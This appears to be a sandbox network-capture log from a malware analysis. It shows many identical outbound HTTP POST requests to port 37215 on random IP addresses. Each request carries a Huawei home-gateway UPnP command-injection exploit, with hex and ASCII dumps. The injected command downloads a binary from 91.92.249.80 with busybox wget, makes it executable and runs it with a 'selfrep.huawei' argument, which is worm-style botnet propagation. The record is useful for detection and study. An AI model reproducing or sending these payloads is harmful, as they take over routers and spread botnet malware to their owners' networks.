                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          678192.168.2.2344490197.187.77.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215990067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          679192.168.2.2356800197.190.171.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216017962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          680192.168.2.2355280157.241.44.16237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216172934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          681192.168.2.236025492.223.14.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216320992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          682192.168.2.2342462157.171.245.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216336012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          683192.168.2.2343192157.93.31.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216340065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          684192.168.2.2353084197.159.255.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216340065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          685192.168.2.2353956157.241.26.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216356039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          686192.168.2.235141041.212.154.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216362000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          687192.168.2.234027441.163.79.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216362000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
